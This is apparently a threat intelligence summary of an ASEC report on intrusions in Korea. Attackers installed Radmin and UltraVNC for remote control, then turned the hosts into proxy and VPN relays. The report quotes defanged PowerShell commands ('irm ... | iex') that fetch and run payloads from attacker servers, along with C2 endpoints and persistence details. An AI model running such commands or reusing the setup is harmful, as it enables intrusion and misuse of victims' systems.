# Attacks in Korea Deploy Radmin and UltraVNC for Remote Control, Followed by Proxy/VPN Tools for Infrastructure Abuse

> AhnLab ASEC observed intrusions against Windows systems in Korea where attackers used PowerShell (curl) to download and install Radmin for initial remote control, followed by UltraVNC for persistence, then deployed the Netch-gateway and CCProxy proxy tools plus SoftEther VPN to repurpose compromised hosts as proxy/VPN nodes. Script comments, tool familiarity, and configuration language suggest a Chinese-speaking threat actor; the initial intrusion vector is unknown.

- **Published:** 2026-09-03T00:00:00Z
- **Last reviewed:** 2026-09-03T00:00:00Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-2323
- **ID:** TL-2026-2323
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Detections:** 9 · **IOCs:** 26 (full data via the Threadlinqs MCP server — Purple tier)

## Description

ASEC (AhnLab Security intelligence Center) documented a multi-stage intrusion campaign against Windows systems in Korea in which the initial access vector is unconfirmed, but the post-compromise chain is fully reconstructed from recovered scripts and installers. The attacker used PowerShell curl to fetch a compressed archive (r.Zip) from hxxp://103.86.86[.]244:800/Gateway/r.Zip containing a batch script, a registry file, and the Radmin remote-control tool. The batch file 11.Bat installed Radmin to C:\Intel\RServer and applied a registry file (install.Reg) that embedded an attacker-linked configuration identifier, 'ruxin', establishing initial remote-desktop control.

Following Radmin, the attacker ran a hidden PowerShell command (irm hxxp://103.86.86[.]244:800/V/deploy.Ps1 | iex) to install UltraVNC into C:\Windows\Fonts\web, registering a malicious Windows service named 'WpnUserHost' (masquerading as a Windows push-notification component) alongside a scheduled watchdog task, 'WpnUserHost_MutualWatchdog', to guarantee persistence. A PyInstaller-built companion agent (recently observed in Go-compiled variants), built around a core agent.py component, enrolls the host with the attacker's infrastructure via /Api/agent/enroll, reports the VNC listening port and status via /Api/agent/heartbeat, and confirms randomized/encrypted VNC credentials via /Api/agent/password_ack against a command server at hxxp://tt.Yeyoujs[.]Com:8443, with a separate tunneling endpoint at tt.Yeyoujs[.]Com:9443.

With remote control established, the actor pivoted the host into proxy/VPN infrastructure for its own use. A further hidden PowerShell command (irm hxxp://103.86.86[.]244:800/Gateway/deploy_silent1.Ps1 | iex) installed Netch-gateway, a Chinese-developer proxy client supporting SOCKS5, Shadowsocks, and KCP, which registers with the operator's backend through /Internal/shadowsocks/auto-config and receives config/heartbeat instructions per-node. Separately, a WinRAR self-extracting (SFX) archive dropped CCProxy, configured to listen as a SOCKS proxy on port 49661 (CCProxy.Ini), and a second WinRAR SFX with a batch installer (a.Bat) deployed SoftEther VPN disguised as svchost.exe (vpn_server.Config), turning the host into an attacker-usable VPN server node. ASEC assesses the operator is Chinese-speaking based on Chinese-language comments in the scripts, familiarity with Chinese-developed tooling (Netch-gateway), and a Chinese-language interface on the proxy management page; no nation-state sponsorship is claimed.

The net effect is a host fully controlled via two redundant remote-access channels (Radmin, UltraVNC) and repurposed as attacker-controlled proxy/VPN relay infrastructure (Netch-gateway, CCProxy, SoftEther VPN) — creating both a direct data-theft exposure on the victim and a downstream risk that the victim's IP/infrastructure is used to relay the actor's other malicious traffic. ASEC has separately tracked a related but distinct cluster (attributed to 'Larva-26010', reported 2026-08-11 at asec.ahnlab.com/en/94995/) abusing SoftEther VPN against Korean web servers with similar disguise techniques (executable renamed to vmtoolsd.exe, WDigest UseLogonCredential registry modification for plaintext credential harvesting) using unrelated infrastructure (64.176.55.16, 45.76.144.150, 139.180.210.71, 64.176.46.157) — suggesting this report may be part of a broader wave of proxy/VPN infrastructure abuse against Korean systems, though ASEC has not formally linked the two campaigns under a single actor label.

## MITRE ATT&CK

- T1059.001 Command and Scripting Interpreter: PowerShell
- T1059.003 Command and Scripting Interpreter: Windows Command Shell
- T1543.003 Create or Modify System Process: Windows Service
- T1053.005 Scheduled Task/Job: Scheduled Task
- T1036.005 Match Legitimate Resource Name or Location
- T1112 Modify Registry
- T1027.002 Obfuscated Files or Information: Software Packing
- T1219 Remote Access Tools
- T1090 Proxy
- T1090.002 Proxy: External Proxy
- T1071.001 Application Layer Protocol: Web Protocols
- T1571 Non-Standard Port
- T1583.001 Acquire Infrastructure: Domains

## Sources

- [Attack Cases in Korea Involving the Installation of Radmin and UltraVNC](https://asec.ahnlab.com/en/95230/)
- [Attack Cases for Domestic Web Servers Running SoftEther VPN in Korea](https://asec.ahnlab.com/en/94995/)
- [Attack Cases in Korea Involving the Installation of Radmin and UltraVNC (mirror)](https://malware.news/t/attack-cases-in-korea-involving-the-installation-of-radmin-and-ultravnc/125337)
- [Attack Cases in Korea Involving the Installation of Radmin and UltraVNC (mirror)](https://www.hendryadrian.com/attack-cases-in-korea-involving-the-installation-of-radmin-and-ultravnc/)
- [HackTool.Win32.Radmin.GH — Threat Encyclopedia](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/hacktool.win32.radmin.gh)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-2323
